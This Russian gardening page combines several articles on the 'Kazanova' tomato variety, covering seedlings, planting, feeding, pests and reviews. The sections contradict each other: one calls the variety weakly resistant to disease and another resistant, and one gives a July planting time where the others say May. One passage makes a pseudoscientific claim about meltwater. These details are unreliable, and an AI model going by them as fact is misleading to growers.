5 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Томат казанова отзывы фото описание

Томаты сорта Казанова

Среднеспелый томат Казанова получил большую популярность у садоводов нашей страны. При соблюдении всех правил агротехники вырастить его сможет каждый огородник, даже начинающий.

Томаты сорта Казанова

Характеристика сорта

Томат сорта Казанова был выведен в северной части нашей страны. Стебель длинный — достигает 1,8-2 м высоты, поэтому по мере роста его нужно подвязывать к шпалере.

Облиственность средняя. Для полноценного роста куст необходимо несколько раз пасынковать, тогда урожай получается не только вкусным, но и обильным. На одной кисти формируется по 4-5 помидоров.

Одной из главных особенностей этой культуры является уникальная форма овощей — удлиненные плоды с раздвоенным концом обладают отменным вкусом и ароматом.

Поверхность плотная, мякоть мясистая и очень сладкая. После полного созревания помидоры обретают насыщенный красный цвет. Средняя длина — 20 см, масса — 160-220 г.

Плюсы и минусы

В описание этой культуры входит несколько достоинств, которые выделяют ее среди других:

  • благодаря плотной кожице помидоры легко переносят транспортировку и не растрескиваются;
  • нестандартная форма плодов;
  • отличный товарный вид;
  • универсальность применения.
  • возможность выращивания на открытой грядке только в теплых регионах (в прохладных климатических условиях эту культуру сажают в теплице);
  • кусты нуждается в пасынковании и подвязке, что усложняет уход.

Болезнеустойчивость

Сорт томата Казанова обладает слабой устойчивостью к болезням и вредителям. Поэтому в процессе выращивания необходимо проводить профилактические обработки.

Урожайность

Урожайность сорта высокая. При соблюдении всех правил агротехники с 1 кв. м. получают до 12, иногда 15 кг помидоров.

Применение

Спелые помидоры используют для приготовления различных блюд — салатов, соусов. Также их консервируют, только перед закладкой в емкость их разрезают пополам.

Из мякоти готовят вкусные соусы, лечо, томатный сок и кетчуп.

Выращивание рассады

Рассада должна быть крепкой

Правильное выращивание томатов Казанова основано на рассадном способе с дальнейшей пересадкой на открытую грядку или в теплицу.

Посев осуществляется примерно за 2 месяца до планируемой пересадки, в середине или в конце марта.

Подготовительные работы

  1. На посев отбирают крупные семена без признаков плесени, черных пятен и желтизны. Сначала семена обеззараживают — опускают в малиновый раствор марганцовки на 20 минут. Затем промывают в чистой воде и обрабатывают препаратом Циркон или зольным раствором (на литр воды используют 2 ст. л. вещества). Вторая манипуляция ускоряет процесс прорастания. Чтобы семена успешно проклюнулись их замачивают в талой воде — заворачивают в марлевую ткань и оставляют в таком состоянии на сутки.
  2. Грунт для посадки подвергают тепловой обработке либо обрабатывают раствором марганцовки. Для выращивания рассады подойдет рыхлая садовая земля с добавлением перегноя и песка в соотношении 3:1:1.
  3. Вырастить рассаду помидоров можно в рассадных ящиках или пластиковых контейнерах с дренажными отверстиями. Перед закладкой грунта емкости дезинфицируют — проливают кипятком.
  4. На дно укладывают керамзит — 3-4 см, затем засыпают почву, оставляя 2 см пространства от верха. За день до посева семян почву увлажняют.

Техника посева

Семена сеют на глубину 1 см, на расстоянии 3-4 см. После посева их орошают теплой водой из пульверизатора, накрывают пленкой или стеклом и ставят в теплое место с рассеянным дневным светом.

  1. Это светолюбивая культура, поэтому ей требуется много света — не менее 10 часов в день. При недостаточном естественном свете используют светодиодные лампы.
  2. Оптимальная температура на момент проращивания семян составляет 25-28°С. После появления всходов ее понижают до 17-20°С, чтобы избежать процесса вытягивания ростков.
  3. Поливать регулярно, раз в неделю. Почву увлажняют при помощи пульверизатора водой комнатной температуры.
  4. В помещении, где находятся посевы, не должно быть сквозняков и резких перепадов температур, которые могут привести к гибели молодых ростков.
  5. Как только ростки выпустят по одной паре настоящих листьев, их пикируют в отдельные емкости вместе с земляным комом. Используют одноразовые стаканчики объемом на 250 мл.
  6. После пикировки томаты нужно подкормить 3 раза. На этапе появления третьего листа вносят азотсодержащие препараты в жидком виде. Через две недели используют комплексное минеральное удобрение — в 5 л воды растворяют 1 ст. л. вещества. На одно растение расходуют 50 мл раствора. Повторная подкормка проводится через две недели этим же препаратом.

Перед высадкой на открытую грядку или в теплицу рассаду нужно закалить. За неделю до планируемой высадки ее постепенно приучают к свежему воздуху — выносят на улицу в солнечные дни и содержат по несколько часов. За сутки до пересадки растения оставляют ночевать на улице.

Пересадка на грядку

Хороший урожай при правильной высадке

По описанию, срок выращивания рассады с момента посева семян и до пересадки в теплицу составляет 50-60 дней. Обычно это приходится на первую декаду мая.

В южной зоне, где томат выращивают в открытом грунте, пересадку проводят только после того, как температура воздуха достигнет 20°С, а почва прогреется до 10-12°С.

Определить готовность рассады можно по следующим признакам:

  • наличие одной или двух цветочных кистей;
  • рассада высотой около 25 см, имеет по 3-4 пары листьев.

Схема пересадки : на 1 кв. м. высаживают не более 4 растений.

Для выращивания томатов на открытой грядке или в теплице грунт нужно удобрить — на 1 кв. м. вносят по 30 г калийной соли и суперфосфата.

Для посадки подготавливают лунки по размеру посадочной емкости, где выращивалась рассада. Ямки проливают водой, затем пересаживают растения методом перевалки земляного кома.

После этого все пустоты засыпают огородной землей и почву вокруг стеблей уплотняют, поливают теплой водой из расчета на одно растение литр воды.

Татьяна Орлова (Василидченко) (канд. с.-х. наук):

При посадке рассады обычно сначала проливают лунку водой,расходуя по 0,5-1,0 литру, после ее впитывания туда погружают корни рассады. После этого высаженную рассаду засыпают землей до половины высоты стебля для увеличения поверхности образования дополнительных корней.

Требования по уходу

В процессе выращивания этой культуре требуется хороший и своевременный уход.

  1. Регулярные поливы по мере подсыхания земли. Увлажнение проводят теплой, отстоянной водой в утренние или вечерние часы. Чтобы избежать гниения стеблей и листьев, воду проливают под корень — на одно растение расходуют 1,5-2 л воды.
  2. Рыхление грунта после каждого полива обеспечивает хорошую влаго- и воздухопроницаемость. В процессе рыхления удаляют сорную траву, которая забирает влагу и препятствует полноценному росту кустов.
  3. За весь сезон томаты нужно подкормить три раза. На этапе достижения растениями 30 см высоты вносят комплексный состав для овощных культур, который можно приобрести в любом садоводческом магазине. Дозировка подбирается согласно инструкции. Перед цветением кусты удобряют суперфосфатом и калийной солью (на ведро воды используют по 2 ст. л. каждого компонента). На этапе формирования плодов проводят третью подкормку таким же составом. Из внекорневых подкормок используют раствор борной кислоты (1 г на 5 л воды) и раствор древесной золы (1 ст. л. на литр воды). Орошение проводят до и после цветения.
  4. Необходимость в пасынкование. Первый раз пасынки обрывают после появления первой цветочной кисти — удаляют отростки длиной около 5 см в пазухах листьев под цветочной кистью. Также удалению подлежат все пасынки, которые формируются в нижней части стеблей, т. к. они отбирают много сил у растений. Вторая манипуляция проводится на этапе формирования плодов. Если вы желаете получить урожай крупных томатов, тогда на каждом стебле нужно оставить не более 4-5 кистей, остальные оборвать.

Татьяна Орлова (Василидченко) (канд. с.-х. наук):

Поскольку сорт Казанова относится к индетерминантным, обладающим продолжительным периодом роста и плодоношения, желательно провести подкормку чаще, чем 3 раза за сезон. В фазу плодоношения, которая может длится 1,5-2 месяца проводят не одну, а 2-3 подкормки комплексными минеральными удобрениями.

Болезни и вредители

В характеристику этого сорта входит слабая устойчивость к болезням и вредителям. Часто эту культуру поражают несколько заболеваний:

  1. Фитофтора (бурая гниль). Для профилактики проводят опрыскивания кустов чесночным настоем в период активного роста и перед цветением. В лечебных целях применяют препарат Заслон, Барьер или ХОМ. Эти препараты эффективны и в лечении фузариозного увядания.
  2. Избавиться от вершинной гнили помогают питательные составы из меда и известняка. Пропорции следующие — на 5 л воды используют 100 г меда и 20 г извести. Орошение проводят утром или вечером.
  3. Из вредителей томатам досаждают слизни. Изгнать паразитов можно следующим способом — опрыскать почву вокруг кустов раствором гашеной извести, затем взрыхлить и посыпать молотым горьким перцем. Кроме слизней томаты повреждаются проволочником. Для борьбы с насекомым используют препарат Базудин. Уничтожить паутинного клеща на томатной грядке поможет раствор карбофоса, а справиться с медведкой — препарат Гром.

Татьяна Орлова (Василидченко) (канд. с.-х. наук):

Вершинная гниль вызывается дефицитом кальция у томата. В профилактических целях 2 раза за сезон проводят внекорневые подкормки томата кальциевой селитрой: во время массового цветения и во время начала плодообразования. Сорта, имеющие удлиненные плоды, подвержены вершинной гнили в большей мере, чем с круглыми.

Отзывы садоводов

Соблюдая все правила посадки и ухода, вы сможете вырастить здоровую и крепкую рассаду томатов Казанова, которая в будущем одарит вас хорошим и вкусным урожаем овощей.

Те, кто уже сажал эту культуру ранее, оставляют только положительные отзывы и отмечают высокую урожайность кустов как в открытом, так и закрытом грунте.

Томат Казанова: характеристика, отзывы, фото, урожайность

Томат Казанова, описание сорта которого представлено в статье, относится к подвидам с высокой урожайностью. Их выращивание не требует тщательного ухода, а плоды обладают необычным вкусом. При слове «томат» большинство из нас представляет себе овощ круглой или овальной формы и красного цвета. В XVII веке плоды, завезенные из Америки, были именно такими. Но генетика и связанная с ней селекционная работа никогда не стояли на месте.

Содержание:

Описание помидоров Казанова

Сейчас в природе существует огромное количество сортов, не имеющих ничего общего с привычными представлениями о томатах. Что интересно, многие люди считают томат овощем. На самом деле это ягода с точки зрения ботаники.

Изменения претерпел не только внешний облик плодов. Были выведены томаты невиданных до настоящего времени цветов: желтого, оранжевого, коричневого, синего, и даже почти черного. Есть даже сорта томатов, которые при достижении полной зрелости сохраняют зеленую окраску, и это совершенно не влияет на их вкус.

Представленный на фото томат Казанова имеет только положительные отзывы тех, кто сажал этот сорт. Томат Казанова был выведен сравнительно недавно, в 2015 году. Оригинатором является В. Н. Дедерко. Он допущен к выращиванию во всех регионах России. В госреестр селекционных достижений томат Казанова попал в 2017 году. Сфера его применения – садово-огородные участки и личные приусадебные хозяйства.

Сорт томата Казанова, отзывы о котором можно найти ниже, относится к среднеспелым, индетерминантным и высокоурожайным сортам помидоров. В высоту томат сорта Казанова может достигать 1,8-2 м. Первые томаты появляются уже в середине июля при условии посадки рассады в начале-середине марта. Поскольку сорт Казанова принадлежит к высокорослым и самостоятельно расти не прекращает, формирование куста производят вручную.

Стебель у томата сорта Казанова сильный, количество листьев на нем среднее. Растение обладает великолепно развитой корневой системой.

Листья у сорта Казанова среднего размера, окрашены в зеленый цвет и имеют шероховатую и бугристую поверхность. Соцветия сложные.

Товарная урожайность томатов сорта Казанова составляет 10,8 кг/1 м². Наибольшую урожайность можно обеспечить, формируя растения в 1 и 2 стебля. Также необходимо соблюдать все агротехнические правила.

Плоды образуют простые кисти. Степень облиственности куста средняя. Растение требует подвязки к опоре и пасынкования. Судя по отзывам дачников, помидоры Казанова, (см. фото), можно выращивать в открытом грунте и в теплице. Выращивание в тепличных условиях возможно в любом регионе России. В открытом грунте томаты выращивают только в южных областях.

Характеристика томатов Казанова

Помидоры Казанова обладают цилиндрической формой, могут достигать в длину 18-20 см. Плотность средняя, плоды слаборебристые. Несозревшие томаты окрашены в светло-зеленые оттенки, полностью зрелые – в традиционно красные. Число семенных гнезд не превышает 2-3. Масса плода составляет от 150 до 200 г. Кожица и мякоть у данного сорта плотная, с малым количеством семян.

Томаты Казанова фирмы «Сиб.сад» обладают отличными вкусовыми характеристиками. Они не склонны к растрескиванию, хорошо хранятся и легко переносят транспортировку. Употреблять их можно в свежем виде, для нарезки салатов и использовать в домашнем консервировании. При консервации томаты сохраняют свою форму. Целиком их подвергать термической обработке не рекомендуют. Лучше резать плоды на половинки или готовить из них лечо, кетчуп или томатный сок.

«За» и «против»

Несмотря на сравнительно молодой «возраст», сорт томатов Казанова уже успел занять прочное место на рынке семян и обрести своих почитателей, которые полюбили его за следующие достоинства:

  • неприхотливость в выращивании;
  • возможность выращивания в теплице и открытом грунте;
  • высокая урожайность;
  • нетипичная форма томатов;
  • выдающиеся вкусовые характеристики;
  • высокие товарные качества;
  • хорошая транспортабельность;
  • широкий спектр использования во всевозможных блюдах.

К недостаткам томата сорта Казанова относятся следующие:

  • кусты нуждаются в постоянном подвязывании и удалении пасынков;
  • сорт помидор Казанова обладает сниженным иммунитетом к большинству болезней и вредителей.

Однако положительные качества томата с легкостью компенсируют его незначительные недостатки.

Правильное выращивание томата Казанова

Семена томатов Казанова для получения рассады сажают за 2-2,5 месяца до пересадки на постоянное место. Обычно это происходит в начале-середине марта.

Посев семян на рассаду состоит из следующих этапов:

  • Нужно обработать семена препаратами для обеззараживания и стимуляции роста. Обычно применяют раствор марганцовки или перекись. Активировать процесс прорастания поможет циркон.
  • Грунт перед посевом слегка увлажняют и дезинфицируют емкости для растений.
  • Семена помидор Казанова сажают рядами с промежутками в несколько сантиметров. Это способствует равномерному распределению света, что очень важно для молодых ростков.
  • Засыпают семена тонким слоем грунта, не более 0,5-1 см.
  • Емкости с семенами переносят в теплое место с хорошим уровнем освещенности. Чтобы сохранить тепло и влажность, сверху емкость нужно накрыть стеклом или полиэтиленом.
  • Как только проклюнутся первые ростки, емкость нужно перенести в более прохладное место. Таким местом может стать подоконник, только нужно обратить внимание на степень освещенности.

  • Необходимо неукоснительно соблюдать температурный режим. Днем воздух должен прогреваться до +22⁰С, ночью – до +18⁰С.
  • Рассаду поливать нужно очень аккуратно. Она не переносит избыточную влажность. Нужно следить за состоянием верхнего слоя почвы.
  • Пикировку проводят при появлении 2 листочков. Молодые растения рассаживают по отдельным стаканчикам.
  • После появления 3-4 листочков применяют удобрения с азотом. Повторно его используют спустя 14 дней после пересадки.
  • Еще 14 дней спустя растения поливают комплексным удобрением из расчета 1 ст.л. на 5 л воды.

В теплице почва прогревается быстрее, чем на грядках, поэтому высаживание рассады можно провести на пару недель раньше. Как правило, в пленочные укрытия растения пересаживают в начале мая. Пересадка на грядки требует стабильной погоды без ночных заморозков. Обычно такая климатическая обстановка устанавливается к началу июня.

Чтобы вырастить томат Казанова, подготовку грядок нужно начинать с осени. В это время в теплице делают грядки и дезинфицируют их вместе с парником. В почву добавляют удобрения, содержащие калий и фосфор. На 1 м² требуется около 30 г удобрения. Весной нужны удобрения, содержащие азот. Их расход их составит 15 г на 1 м².

Пересадка томатов на грядки и в теплицу выглядит следующим образом:

  • в каждую лунку нужно влить 1 л теплой воды, добавить перегной или торфяную смесь;
  • расстояние между томатами и рядами не должно быть меньше 40 см
  • рассаду аккуратно размещают в посадочной ямке и засыпают грунтом.

Молодые растения после пересадки нужно обязательно мульчировать при помощи соломы или прошлогоднего сена.

Дальнейший уход за томатами заключается в поливе, подкормке и пасынковании. Полив должен быть обильным. Это особенно важно при выращивании сорта Казанова в теплице. Для поддержания влажности воздуха на уровне 50% поливать посадки нужно каждый день.

Поливать растения лучше всего в утренние часы согретой водой. Глубина влажного грунта должна составлять не менее 50 см. Оптимальным для томатов сорта Казанова является использование капельного полива.

После каждого увлажнения почву рыхлят. Делать это необходимо 1-2 раза в неделю.

Сорт помидор Казанова нуждается в регулярном внесении удобрений. Золу или минеральные удобрения можно применять раз в 10 дней. Важно помнить, что сухие удобрения рассыпают не только непосредственно под куст, но и на землю вокруг. Связано это с тем, что у растений мощная разветвленная корневая система. Такой способ позволяет томатам получить больше питательных веществ, необходимых для нормального роста и развития.

Чтобы получить обильный урожай, нужно регулярно обрывать все молодые побеги, растущие из пазух листьев. Правильное выращивание томата Казанова предполагает получение более высоких урожаев в том случае, если формировать кусты в два стебля.

Вредители и заболевания

По отзывам огородников, помидор Казанова подвержен многим заболеваниям. Наиболее распространенными из них являются:

  • фитофтороз или бурая гниль. Для лечения применяют настой чеснока или препараты «Барьер» и «Заслон».
  • бурая пятнистость. Для борьбы с ней используют препарат «Хом».
  • фузариозное увядание. Для лечения этого заболевания подходит средство «Барьер».
  • вершинная гниль. Избавиться от нее помогает смесь меда и известняка, которую используют для подкормки растений.

Кроме опасных для томата сорта Казанова заболеваний погубить его могут разнообразные вредители.

  • слизни. Прогнать их с томатов можно с помощью гашеной извести. Для этого приготовленным раствором нужно обработать землю рядом с кустами. Затем ее нужно хорошо прорыхлить и посыпать черным молотым перцем.
  • медведка. В борьбе с этим вредителем хорошо зарекомендовал себя препарат «Гром».
  • проволочник. Избавиться от него поможет средство «Базудин».
  • паутинный клещ. От него хорошо помогает раствор карбофоса.

Чтобы защитить растения от вредителей, томатам необходим регулярный осмотр. Обработку химическими средствами начинают при первом появлении признаков болезней или вредителей.

О том, как растет и плодоносит томат Казанова, вы можете узнать из видео-обзора

Вывод

Томат Казанова при соблюдении правил агротехники обязательно порадует всех овощеводов обильным урожаем. Его приятный вкус и оригинальная форма придутся по душе не только детям, но и взрослым, а радетельным домохозяйкам помогут приготовить впрок массу разных заготовок.

Отзывы о томате Казанова

Инна, г. Днепропетровск.

Мне очень понравился этот сорт. Урожайность на высоте, приятный вкус, помидоры без пустот. Посадили немного, просто попробовать. В следующем году планируем увеличить количество кустов. Ухаживать за ним просто, как за всеми сортами.

Александр, г. Череповец

Сорт Казанова выращиваю в теплице. Очень доволен результатом. Помидоров созревает много, успеваем и в свежем виде поесть, и замариновать на зиму. В банках они хранятся хорошо, форму не теряют, не трескаются. А главное – можно собрать семена и посадить их на следующий год.

Томат Казанова: характеристика и описание сорта

Слово томат ассоциируется у всех с овощем округлой формы и красного цвета. Действительно, первые томаты завезены к нам из Америки в далеком XVI веке были именно такими. Благодаря развитию генетики и связанной с ней селекционной работы, появились сорта, совершенно непохожие на наши привычные представления об этой ягоде. Не удивляйтесь, с точки зрения ботаники, томат – это ягода, так же как и арбуз. Изменился не только внешний вид плодов – появились невиданные до сих пор цвета томатов: желтый, оранжевый, коричневый, синий и даже почти черный. Есть помидоры, которые и в полной зрелости остаются зелеными, при этом вкус их ничуть не страдает.

Сегодня мы хотим познакомить вас с сортом томата, отличающимся необычной, можно даже сказать, пикантной формой плодов. Его название – Казанова – вполне ей соответствует.

Чтобы разобраться в том, что представляет собой этот оригинал, составим подробное описание и характеристику томата сорта Казанова. Вот он на фото во всей своей красе.

Описание и характеристика

Сорт томата Казанова внесен в Госреестр сельскохозяйственных достижений в 2017 году. Оригинатором и патентообладателем его является Дедерко Владимир Николаевич. Производит и продает семена помидоров сорта Казанова агрофирма Сибирский сад, которая находится в г. Новосибирске. Какие особенности у этого сорта томатов?

  • Казанова является среднеспелым сортом. При посеве в марте на рассаду первые плоды поспевают уже в июле.
  • Сорт относится к индетерминантным, т. е. самостоятельно свой рост не останавливает. Формировать его нужно огороднику. На практике высота куста составляет около 2 м.
  • Казанова рекомендован для выращивания во всех регионах, но в открытом грунте его можно сажать только на юге. Севернее этот сорт томата высаживают в теплицу.
  • Наилучшие результаты томат сорта Казанова дает при формировании в один или в 2 ствола. Все остальные пасынки нужно обрывать.
  • Плод у Казановы необычной удлиненной формы с оригинальным раздвоением на конце. Длина не маленькая – до 20 см. Вес тоже неплохой – до 200 г. В кисти может завязаться до 5 плодов.
  • Цвет у плода в полной спелости ярко-красный. Кожица и мякоть плотные, семян почти нет. Вкус у томата отличный с заметной сладостью.
  • Оригинатор позиционирует сорт томата Казанова как салатный, но, по отзывам потребителей, он очень хорош в маринованном виде. Плотная кожица не трескается при заливке кипятком, а сами томаты благодаря своей форме очень плотно укладываются в банки. Подойдет он и для других заготовок, вот только сока мясистые плоды много не дадут.
  • Томат сорта Казанова хорошо хранится, его можно транспортировать на дальние расстояния. Товарные качества при этом не теряются.

Чтобы описание и характеристика томата сорта Казанова были полными нужно сказать самое важное: у него отличная урожайность. При хорошем уходе она достигает 12 кг с каждого кв. м. Кусты буквально увешаны крупными красивыми плодами.

Чтобы получить заявленный производителем урожай, нужно соблюдать все правила агротехники и, в первую очередь, вырастить крепкую качественную рассаду.

Как вырастить рассаду

Ко времени высадки в теплицу она должна иметь возраст около 2 месяцев. Сроки посева семян корректируют с учетом наступления устойчивого тепла. В средней полосе это начало-середина марта, в других регионах сроки могут отличаться.

Секреты крепкой рассады:

  • Выбираем только крупные семена.
  • Обрабатываем их протравителем и стимулятором роста. В качестве первого используют марганцовку, перекись водорода, сок алоэ, фитоспорин. В качестве второго подойдет Иммуноцитофит, Циркон, Эпин, Зольный раствор. Хорошо пробуждает семена томатов и дает им силу талая вода. Ее легко получить, заморозив в холодильнике. Не забудьте слить незамерзший остаток. Целебные свойства и особая структура воды сохраняются 12 часов после таяния.
  • Сеем семена томата Казанова в рыхлый, хорошо аэрируемый и влагоемкий грунт, который нужно проморозить.
  • Обеспечиваем посевам тепличный режим под полиэтиленовым пакетом.
  • Первые петельки всходов – сигнал, что емкость нужно перенести на прохладный, светлый подоконник.
  • Достаточное освещение – основное условие коренастой крепкой рассады. Чем больше расстояние между листьями на стебле, тем меньше кистей сможет завязать томат Казанова. Чтобы получить максимальный урожай, рассада не должна вытягиваться.
  • Рассаде нужен оптимальный температурный режим: около 18 градусов в ночное время и около 22 градусов в дневное.
  • Потребуется полив, но без избытка влаги. Поливаем теплой водой по мере высыхания верхнего слоя почвы.
  • Своевременная пикировка томата Казанова в фазе 2 настоящих листьев в отдельные емкости с объемом не менее 0,5 л обязательна. Чем меньше повреждена корневая система при пикировке, тем быстрее тронутся в рост томаты Казанова.
  • Распикированную рассаду нужно подкармливать. Делаем это 3 раза. Первая подкормка проводится удобрением с преобладанием азота на этапе появления третьего настоящего листа. Для нее подойдет Агрикола №3. Вторая подкормка – через 12-15 дней после пикировки, третья – еще через 2 недели. Для них растворяем ст. ложку комплексного удобрения без верха на 5 л воды. На одно растение достаточно потратить 0,1 л раствора.
  • Закалка рассады томата Казанова начинается за 2 недели до переселения в теплицу. Ее проводим постепенно, защищая на первых порах томаты от ветра и яркого солнца. Проще всего прикрыть растения укрывным материалом.

Но мало вырастить качественную рассаду. Ее нужно вовремя высадить и правильно ухаживать за томатами.

Высадка и уход

В теплицу томаты высаживают раньше, чем в открытый грунт, так как почва в ней прогревается быстрее. Иногда это возможно уже в начале мая. Грядки для высадки должны быть подготовлены с осени, а сама теплица и грунт продезинфицированы. С осени вносят фосфорные и калийные удобрения по 30 г на кв. м, а весной – азотные – 15 г на ту же площадь. Если вы не раскрываете теплицу на зиму, все удобрения можно внести с осени.

Опытные огородники советуют менять верхний слой грунта хотя бы на штык лопаты раз в 3 года.

Из органических удобрений нужно добавить перегной – до 8 кг на кв. м или 300 г биогумуса на ту же площадь. Хорошим источником калия может стать зола, особенно если почвенная реакция кислая. В ней также содержатся микроэлементы. Источником кальция является измельченная яичная скорлупа. На супесчаных почвах наблюдается недостаток магния. Его можно восполнить внесением удобрения Маг-бор, которое одновременно обогатит землю бором.

Но это только стартовое питание. В дальнейшем корни томатов займут всю площадь грядки, и им не будет хватать пищи.

В подготовленные и политые лунки высаживают рассаду томатов сорта Казанова. Схема для посадки: 40 см между кустами и 60 см между рядами. Переросшую рассаду томата Казанова сажают в канавки, удалив нижние листья с ориентацией верхушки на север.

Посадки обязательно мульчируют соломой или скошенной травой, которую нужно предварительно подвялить. Подойдет и прошлогоднее сено. Следующий полив можно проводить примерно через неделю. Но если растения сигнализируют подвяданием листьев о недостатке влаги, нужно произвести его раньше.

Что еще нужно томатам сорта Казанова для хорошего урожая:

  • Своевременный полив. В теплице дождей не бывает, поэтому недостаток влаги будет на совести огородника. Уровень влажности почвы поддерживают около 80%, а воздуха – примерно 50%. Добиваются этого еженедельным поливом под корень. Воды льют столько, чтобы промочить землю на 50 см. Делать полив лучше рано утром, но вода должна быть обязательно теплой. Томаты сорта Казанова с благодарностью отнесутся к капельному поливу. Снабжение влагой растений в этом случае будет оптимальным.
  • Томат Казанова очень хорошо отзывается на подкормки. Их проводят каждую декаду, начиная через 12 дней после укоренения рассады. Лучший выбор – специальные удобрения, предназначенные для подкормки пасленовых культур.
  • Чтобы помидор Казанова тратил все силы на формирование урожая, а не на отращивание пасынков, их регулярно обрывают, оставляя пенек в 1 см. Для томата Казанова лучшая форма выращивания – в 2 стебля.

Дополнительно о правилах выращивания томатов в теплице можно посмотреть на видео:

На соблюдение всех правил посадки и выращивания томаты Казанова ответят огороднику щедрым урожаем оригинальных и вкусных плодов. Это удивительное воплощение фантазии селекционеров порадует не только вас, но и ваших гостей.

Среднеспелый, высокоурожайный и необычный по форме томат «Казанова»: отзывы фермеров и советы по выращиванию

Томат Казанова завоевывает сердца огородников по всей стране. Мало того, что вырастает он изумительно красивым, так и вкус у овоща сладкий и сочный. Сложно представить, что раньше все томаты считали ядовитыми. Сегодня из помидоров, в том числе из сорта Казанова, готовят различные блюда. Рассмотрим, как вырастить хороший урожай томатов Казанова на своем участке.

Описание сорта

Сорт индетерминантный и высокоурожайный. Казанову рекомендуют выращивать в теплице, особенно в средней полосе России. Сеют овощ в марте, первые плоды поспевают уже в начале июля. Наилучший урожай дачники собирают при формировании куста в 2 стебля.

Отличительные черты

Кусты помидоров в росте не ограничены, поэтому растение нужно подвязывать. В среднем высота одного куста – около 2 м. Вырастают они ветвистые, с густой листвой. Корневая система развивается мощная. Лучшие предшественники – тыквенные или бобовые культуры. После картофеля или перца сажать томаты не рекомендуется.

Характеристики томатов, урожайность

Форма у помидора вытянутая, внешне напоминает небольшой банан или кабачок. Средняя длина – около 20 см. Кожура глянцевая, в меру плотная, поэтому томаты долго хранятся. Один плод весит около 180-200 г. На кисти завязывается до 5 томатов.

Цвет у Казановы насыщенно-красный, аромат классический. Семян практически нет. Казанова обладает сладким вкусом, не водянистый. Товарные качества сохраняются даже после транспортировки на дальние расстояния. С 1 кв. м собирают около 12 кг спелых томатов.

Как вырастить рассаду

Высаживают сорт преимущественно рассадным способом. Так саженцам легче прижиться в земле. Посадка на рассаду производится примерно за 50-60 дней до момента высадки в грунт.

Подготовка семян

Опытные огородники советуют приобретать семена в магазине, так вероятность заражения урожая инфекциями намного меньше. Рекомендуется приобретать семенной материал только у проверенных продавцов, избегая случайной покупки.

Для начала семена дезинфицируют. Самый простой способ — разложить семена под солнцем на неделю. Солнечные лучи хорошо прогреют семена и уничтожат на их поверхности опасные бактерии.

Затем семена проращивают. Для этого помещают их во влажный марлевый мешочек и убирают в теплое место. Проращивание показывает процент всхожести семян, помогает им выработать крепкий иммунитет перед болезнями и насекомыми.

Емкость и почва

Для рассады подходит любая чистая и сухая тара небольшого размера. Если нет специальной емкости, подойдут, например, пластиковые стаканчики. Наиболее удачный вариант — торфяные горшочки. Они доступны, сделаны из экологически чистого материала и прекрасно удерживают влагу. При пересадке саженцы можно высаживать прямо в горшочках.

Землю для рассады лучше приобрести в магазине для садоводов. Готовые составы заранее обеззаражены и безопасны, обогащены витаминами и соответствуют необходимому уровню кислотности.

Самая популярная смесь для рассады – грунт «Универсальный». Продается он в пакетах по 500 г или 1 кг.

Посев

Процедуру посева лучше начинать с утра. В тару насыпьте грунт и сделайте в нем маленькие ямки глубиной около 1-2 см. В каждую ямку поместите семя и засыпьте его сверху землей. Не забудьте после посева обязательно полить землю теплой отстоянной водой.

Выращивание и уход

Выращивайте рассаду в самом теплом и светлом месте в доме, например, на подоконнике. Оптимальная температура – не менее 22 градусов. Ростки любят много света. Если его недостаточно, организуйте дополнительную подсветку люминесцентными лампами. Избегайте сквозняков, так как растения могут заболеть.

Важно! Ни в коем случае не поливайте Казанову холодной водой из-под крана. Это прямая угроза для здоровья и роста кустов.

Поливают рассаду каждые 7-9 дней. Будьте предельно аккуратны, не допускайте переувлажнения почвы. Лучше использовать для полива обычную пипетку — с ее помощью влага будет попадать прямо под корень, минуя еще не окрепшие ростки.

Уже через 1-2 недели рассаду удобряют. Чередуйте минеральные и органические подкормки. Помидоры очень любят аммиачную селитру, соляной раствор, жидкий птичий помет, настой на крапиве. Также не лишним будет использование стимуляторов роста, например, средства «Фитоспорин+». Препарат насыщает ростки макро- и микроэлементами, обеспечивает в будущем богатый урожай.

Как выращивать помидоры

Сажают томаты в начале июля. Казанова требователен к составу почв, поэтому выделите томату просторный и питательный земельный участок. Перед посадкой обязательно продезинфицируйте землю. Для этого подойдет раствор марганцовки. Полейте им грядки, тем самым обезопасив кусты от насекомых-вредителей.

Посадка

Оптимальное расстояние между кустами Казановы должно быть не менее 50 см. Растение мощное, кусты не должны мешать друг другу. После посадки возле каждого кустика нужно установить деревянный колышек. Он необходим для будущей подвязки растения к опоре. В противном случае стебли и кисти могут сломаться под тяжестью созревших помидоров.

Важно! Если на участке растут сразу несколько сортов помидоров, около каждого установите табличку с названием томата и датой посадки, чтобы учесть все нюансы ухода.

Уход за сортом Казанова заключается в соблюдении следующих правил агротехники:

  1. Рыхлите грядки каждую неделю. Этот прием помогает растению получать больше кислорода. Особенно рыхление актуально перед поливом и внесением удобрений.
  2. Удаление сорняков. Они селятся на помидорных грядках и живут за счет овощей. Удаляйте сорняки каждые 10 дней. Если лето выдалось дождливым и туманным, то чаще.
  3. Регулярные поливы. Поливая кусты, старайтесь избегать попадания воды на стебли и листья. Повышенная влажность повышает риск развития грибковых заболеваний. Оптимальная температура воды должна быть не менее 18 градусов. В среднем на один куст уходит около 0,5 л воды.
  4. Внесение удобрений. Томаты любят азотсодержащие вещества, поэтому используйте подкормки мочевиной или селитрой. Особенно это актуально в период цветения и плодоношения. Соблюдайте точные дозировки — переизбыток азота вредит помидорам.
  5. Если Казанова растет в теплице, не забывайте проветривать сооружение. Для этого просто открывайте двери или форточки.

Особенности выращивания и возможные трудности

Сорт Казанова нуждается в обязательном формировании куста. Чаще всего Казанову формируют в 1-2 стебля, боковые удаляют. На главном стебле оставляют около 7-10 кистей, а верхушку прищипывают, чтобы остановить рост куста. При такой формировке ускоряется развитие томатов на 1-2 недели. Также уменьшается риск заболевания растений, так как стебель и листья приподнимаются над землей.

Еще один важный этап формирования – удаление пасынков. Особенно это важно для северных районов. Овощам нужно успеть созреть за короткое время, а для этого нагрузка на куст не должна быть очень большой. Большое количество пасынков и листьев приводит к чрезмерной густоте посадок.

Болезни и вредители

Казанова устойчив ко многим заболеваниям, но иногда из-за внешних факторов или погрешностей в уходе они появляются. В первую очередь, опасайтесь фитофторы. Это самый распространенный грибок, избавиться от которого практически невозможно. Проявляется в виде бурых и коричневых пятен на листьях. Если болезнь не лечить, кусты засохнут и погибнут. Споры грибка способны храниться в почве, семенах, остатках старых растений, поэтому так важно обеззараживать землю.

